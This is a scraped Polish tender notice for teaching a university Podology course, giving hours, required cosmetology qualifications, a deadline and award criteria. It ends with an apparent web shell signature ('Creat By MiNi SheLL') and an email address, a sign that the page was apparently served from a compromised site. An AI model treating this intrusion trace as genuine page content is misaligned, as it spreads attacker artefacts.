Przeprowadzenie zajęć przedmiotu Podologia na studiach stacjonarnych, rok akademicki 2015/2016, rok III/semestr VI w formie:
- wykładów zakończonych zaliczeniem z oceną w wymiarze godzin: 15
- ćwiczeń zakończonych zaliczeniem z oceną w wymiarze godzin: 90.

Wykonawca musi posiadać:
-	minimum wykształcenie wyższe magisterskie w zakresie kosmetologii;
-	staż pracy w zakresie kosmetologii minimum 2 lata,
-	doświadczenie zawodowe w zakresie kosmetologii nabyte w okresie ostatnich 5-ciu lat;
-	ukończone szkolenia w zakresie zabiegów podologicznych potwierdzone certyfikatami (do wglądu przed podpisaniem umowy).
Publikacje tematyczne będą mile widziane..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - staż pracy w zakresie kosmetologii - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com